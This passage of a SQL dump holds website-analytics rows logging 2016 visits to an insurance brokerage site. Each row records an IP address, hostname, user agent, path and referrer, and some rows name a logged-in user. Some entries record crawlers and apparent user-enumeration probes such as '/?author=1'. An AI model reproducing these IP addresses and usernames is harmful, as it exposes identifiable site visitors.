900','','','','','','0','0',0),(23750,'0b_347b524a812b2597c6542eda707c3a16','1462222291','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(23751,'0b_16b2b71f92f2fd859ed36b7257a22057','1462222349','180.76.15.8','baiduspider-180-76-15-8.crawl.baidu.com','/igo/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(23754,'0b_347b524a812b2597c6542eda707c3a16','1462222434','24.186.240.34','ool-18baf022.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(23757,'0b_347b524a812b2597c6542eda707c3a16','1462222774','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(23760,'0b_347b524a812b2597c6542eda707c3a16','1462222775','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(23762,'0b_347b524a812b2597c6542eda707c3a16','1462222779','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(23765,'0b_347b524a812b2597c6542eda707c3a16','1462222797','24.186.240.34','ool-18baf022.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(23766,'0b_67e6173d2dc9f6759a754c462b21f3b9','1462223378','74.92.92.57','74-92-92-57-philadelphia.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','','Google','','','','','0','0',0),(23768,'0b_67e6173d2dc9f6759a754c462b21f3b9','1462223382','74.92.92.57','74-92-92-57-philadelphia.hfc.comcastbusiness.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(23771,'0b_8ad82bd324f52f9c049bd3ef43f21ed1','1462223900','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23772,'0b_1371d92c560280e66517d41464fefb68','1462224594','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(23775,'0b_e6143760ea88c37fa204548757958711','1462224624','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(23778,'0b_e6143760ea88c37fa204548757958711','1462224625','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(23780,'0b_e6143760ea88c37fa204548757958711','1462224633','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(23783,'0b_918b348d11fbdd1e8b7affe874840c53','1462225043','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(23786,'0b_e6143760ea88c37fa204548757958711','1462225152','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(23787,'0b_918b348d11fbdd1e8b7affe874840c53','1462225201','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(23790,'0b_918b348d11fbdd1e8b7affe874840c53','1462225203','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(23793,'0b_e6143760ea88c37fa204548757958711','1462225395','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(23796,'0b_e6143760ea88c37fa204548757958711','1462225396','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(23798,'0b_e6143760ea88c37fa204548757958711','1462225399','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','','','0','0',0),(23799,'0b_e6143760ea88c37fa204548757958711','1462225410','24.186.240.34','ool-18baf022.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(23801,'0b_4ac425a41691436b56b2a0fdd9ffecf5','1462226336','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/SSO/235_11.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23802,'0b_147d8cb25929614b185cac27a9d02a52','1462227454','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(23805,'0b_147d8cb25929614b185cac27a9d02a52','1462227457','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(23808,'0b_147d8cb25929614b185cac27a9d02a52','1462227458','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(23810,'0b_147d8cb25929614b185cac27a9d02a52','1462227590','24.186.240.34','ool-18baf022.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','akepecs','','0','51',0),(23813,'0b_ccd6719648023acf80a3d38846ee2e90','1462231235','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23816,'0b_8adcf6ddc22f801df3bc60ced8a3cc5c','1462233315','128.199.63.64','128.199.63.64','/robots.txt','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(23817,'0b_8adcf6ddc22f801df3bc60ced8a3cc5c','1462233322','128.199.63.64','128.199.63.64','/agent-tools/','SafeDNSBot (https://www.safedns.com/searchbot)','','',0,'','','us','','','searchbot','','','','0','0',0),(23819,'0b_ef56fc708746f90a6dca855ac2b8885b','1462235556','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(23820,'0b_ef56fc708746f90a6dca855ac2b8885b','1462235556','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(23823,'0b_ef56fc708746f90a6dca855ac2b8885b','1462235558','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(23826,'0b_ef56fc708746f90a6dca855ac2b8885b','1462235560','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(23828,'0b_ef56fc708746f90a6dca855ac2b8885b','1462235574','24.186.240.34','ool-18baf022.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','akepecs','','0','51',0),(23829,'0b_ef56fc708746f90a6dca855ac2b8885b','1462236331','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1280 x 720','','','','akepecs','','0','51',0),(23832,'0b_ef56fc708746f90a6dca855ac2b8885b','1462236333','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','akepecs','','0','0',0),(23834,'0b_ef56fc708746f90a6dca855ac2b8885b','1462236334','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','akepecs','','0','51',0),(23837,'0b_ef56fc708746f90a6dca855ac2b8885b','1462236342','24.186.240.34','ool-18baf022.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1280 x 720','','','','akepecs','','0','51',0),(23840,'0b_0616eb98e5515ad26cfebe67b2ac2128','1462236838','180.76.15.12','baiduspider-180-76-15-12.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(23843,'0b_3f1dafeb142e57d9781758e228bc0d0b','1462236875','208.115.111.66','208-115-111-66-reverse.wowrack.com','/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23844,'0b_5dcc838f907650ce0bf5507bd9a166ef','1462237113','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(23847,'0b_5dcc838f907650ce0bf5507bd9a166ef','1462237115','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(23850,'0b_5dcc838f907650ce0bf5507bd9a166ef','1462237118','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','0',0),(23852,'0b_5dcc838f907650ce0bf5507bd9a166ef','1462237126','24.186.240.34','ool-18baf022.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1600 x 900','','','','akepecs','','0','51',0),(23853,'0b_1502bab8ae8fcf4577fa7bda23f2d354','1462237919','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(23856,'0b_70c7f9e3f0a1af25a9db18de1d355987','1462238047','65.123.142.184','65.123.142.184','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.149 Safari/537.36','','',0,'Win7','Chrome 33','','','','','','','','0','0',0),(23859,'0b_6a43abea0181cf3350bff08e868062b2','1462238060','46.4.120.3','static.3.120.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23862,'0b_6a43abea0181cf3350bff08e868062b2','1462238063','46.4.120.3','static.3.120.4.46.clients.your-server.de','/SSO/235_29.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23865,'0b_6a43abea0181cf3350bff08e868062b2','1462238066','46.4.120.3','static.3.120.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23868,'0b_6a43abea0181cf3350bff08e868062b2','1462238070','46.4.120.3','static.3.120.4.46.clients.your-server.de','/SSO/235_29.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23871,'0b_6a43abea0181cf3350bff08e868062b2','1462238073','46.4.120.3','static.3.120.4.46.clients.your-server.de','/left.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23874,'0b_6a43abea0181cf3350bff08e868062b2','1462238080','46.4.120.3','static.3.120.4.46.clients.your-server.de','/main.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23877,'0b_6a43abea0181cf3350bff08e868062b2','1462238086','46.4.120.3','static.3.120.4.46.clients.your-server.de','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23879,'0b_1a49bfdbccd22833c9c9b7472de3a76d','1462238544','46.4.123.172','static.172.123.4.46.clients.your-server.de','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23882,'0b_1a49bfdbccd22833c9c9b7472de3a76d','1462238546','46.4.123.172','static.172.123.4.46.clients.your-server.de','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23883,'0b_1a49bfdbccd22833c9c9b7472de3a76d','1462238549','46.4.123.172','static.172.123.4.46.clients.your-server.de','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23885,'0b_1a49bfdbccd22833c9c9b7472de3a76d','1462238553','46.4.123.172','static.172.123.4.46.clients.your-server.de','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23888,'0b_1a49bfdbccd22833c9c9b7472de3a76d','1462238556','46.4.123.172','static.172.123.4.46.clients.your-server.de','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23891,'0b_1a49bfdbccd22833c9c9b7472de3a76d','1462238558','46.4.123.172','static.172.123.4.46.clients.your-server.de','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','de','','','MJ12bot','','','','0','0',0),(23892,'0b_5ebd0c60643a48d3d932a7d33121aff8','1462239828','52.70.48.63','ec2-52-70-48-63.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31','','',0,'MacOSX','Chrome 26','','','','','','','','0','0',0),(23894,'0b_afbd69dda0d5cefb00ebb111d4f31a9d','1462240339','123.125.71.13','baiduspider-123-125-71-13.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(23895,'0b_e9457fb275ae5cd457ed472de5f26c65','1462240819','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','http://runstocks.com/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(23897,'0b_e9457fb275ae5cd457ed472de5f26c65','1462240818','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','http://runstocks.com/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(23898,'0b_ac91eedc2b049f2f4a9de6be45d76dec','1462240871','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)','http://www.hifidesign.ru/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(23900,'0b_b09f862e3d483c15524cd4451fb560a0','1462242238','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23901,'0b_0e445e56d9d51164fdcddbd5b55ca6f7','1462244378','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(23904,'0b_315324e959698fef256f05b70c9dc39e','1462244429','66.249.64.94','crawl-66-249-64-94.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(23906,'0b_f1ae59f1791d9b2c5c86790cfad6a2a3','1462244887','42.96.177.34','42.96.177.34','/','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23909,'0b_f1ae59f1791d9b2c5c86790cfad6a2a3','1462244891','42.96.177.34','42.96.177.34','/?author=1','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23910,'0b_f1ae59f1791d9b2c5c86790cfad6a2a3','1462244901','42.96.177.34','42.96.177.34','/?author=3','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23913,'0b_f1ae59f1791d9b2c5c86790cfad6a2a3','1462244912','42.96.177.34','42.96.177.34','/?author=4','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(23916,'0b_aa1c8a6650c323d7b351ca7c07ca6104','1462245596','180.153.236.73','180.153.236.73','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0); 360Spider(compatible; HaosouSpider; http://www.haosou.com/help/help_3_2.html)','http://empireins.com/','',0,'Win7','','cn','','','','','','','0','0',0),(23918,'0b_6146a80c95cc11085bca9edc43edf05c','1462247097','24.90.225.25','cpe-24-90-225-25.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(23919,'0b_6146a80c95cc11085bca9edc43edf05c','1462247100','24.90.225.25','cpe-24-90-225-25.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(23921,'0b_6146a80c95cc11085bca9edc43edf05c','1462247103','24.90.225.25','cpe-24-90-225-25.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(23924,'0b_6146a80c95cc11085bca9edc43edf05c','1462247124','24.90.225.25','cpe-24-90-225-25.nyc.res.rr.com','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','Shmuli','','0','51',0),(23927,'0b_c84da2967e4928851b47d60f83c84346','1462249538','66.249.64.89','crawl-66-249-64-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(23930,'0b_f8e02b582aa35d631fe1c215f6d4ac62','1462250286','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(23931,'0b_568b8f5533420d15631284c3b56eff51','1462252670','176.77.123.68','ip-176-77-123-68.bb.netbynet.ru','/agent-tools/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; Touch; MASMJS)','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1043.XLlF4qxyMqiFJsJI5BxACTjlZO92reNZVNaVY5ZuZ8Dq0Ut_o1V3GMSpQzgocFHa.04b7de41123c210d3c2f827a225ba9d9295426f5&uuid=&state=AiuY0DBWFJ4ePaEse6rgeAjgs2pI3DW9J0KiE5XNXd0dp0ZMwFHoviUoYa6nzP7MSi3gOS8hVmLOHyRvVYIngw6lFneNrTRkirjY9KLwNEK9dmS3FXuDc5aXimGEzqQwH4Bxe_FKSvEst_PQm3NWhHLYFMamxg9mpCRxePBpwryB5-bM2R2ir8--8PwZTJDaiEeP2M1YcCpQJUEW6LvTBw&data=UlNrNmk5WktYejR0eWJFYk1LdmtxanJHSFhXak9Sei1wb0JZNnQ1Y0dPdThsRE5FR2pMQkxSTTA0Mmd5c1JTZ0oyTENXYXg1ZEZ5RERyM0daRUFFbk16bF9VbGJXWlNBTDlKV1dzbUpaLUkyT1FnSjdGYWNjT3AxS1NuU21JMWs&b64e=2&sign=4432db195cc87c34b5a690e7606d4f12&keyno=0&l10n=ru&cts=1462245846322&mc=5.79333290458','',0,'Win7 x64','IE 10','ru','','','','','','','0','0',0),(23933,'0b_04fe5751a146212ac0f5977eb84a36ea','1462252674','178.140.84.37','broadband-178-140-84-37.nationalcablenetworks.ru','/underwriting-cheat-sheets/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; MAAU; MAAU)','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1043.bLoW8bElMQ-Z_f85a1Z_jEIQc5iRLN-BMAnGdilMs39CocQVfo6nGjq6y53cEaVP.9e7945ae260d4132948becfdc0e5eb3a67476351&uuid=&state=AiuY0DBWFJ4ePaEse6rgeAjgs2pI3DW9J0KiE5XNXd0dp0ZMwFHoviUoYa6nzP7MFsomsouu4qdi-O3T7Ct1HDmy-_aZFn9gZvWsN4pM6S9wtWpIIbWG8JZcMR0Ia27h5Pr5o5QoVFk4h1XyJUz_sgF2gB53wa-eflkw1HCiO6rsA7mLhPIWz73lVOLTvmAKPnRjW_4DCTv_2ADev6o7mQ&data=UlNrNmk5WktYejR0eWJFYk1LdmtxanJHSFhXak9Sei1wb0JZNnQ1Y0dPdVN3dF9YOXRlUmJhemFZQmtmMENJZ2RBT2dIaDlXR29kY3daZGJnTmtvXzVrOWR2bklJOXRSQ0hLN2ZZTG9PMTAtb0luQk93S0VaSXdHX0x5MzU1dU81Ujk3Zmd3WjRfbw&b64e=2&sign=4ece6cbf4e422a6e1953a5bcd269d49d&keyno=0&l10n=ru&cts=1462245846322&mc=3.99857720589','',0,'Win8','IE 10','ru','','','','','','','0','0',0),(23936,'0b_2c9e42576168d35f2e5160ebbea20538','1462254764','79.116.28.136','79-116-28-136.rdsnet.ro','/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23937,'0b_2c9e42576168d35f2e5160ebbea20538','1462254767','79.116.28.136','79-116-28-136.rdsnet.ro','/about-us','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23939,'0b_2c9e42576168d35f2e5160ebbea20538','1462254768','79.116.28.136','79-116-28-136.rdsnet.ro','/about-us/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23940,'0b_2c9e42576168d35f2e5160ebbea20538','1462254769','79.116.28.136','79-116-28-136.rdsnet.ro','/agent-tools','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23943,'0b_2c9e42576168d35f2e5160ebbea20538','1462254770','79.116.28.136','79-116-28-136.rdsnet.ro','/agent-tools/','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23945,'0b_2c9e42576168d35f2e5160ebbea20538','1462254771','79.116.28.136','79-116-28-136.rdsnet.ro','/aig-releases-new-term-rates-and-re-enters-ny','Java/1.6.0_04','','',0,'','','ro','','','Java','','','','3','0',0),(23948,'0b_2c9e42576168d35f2e5160ebbea20538','1462254772','79.116.28.136','79-116-28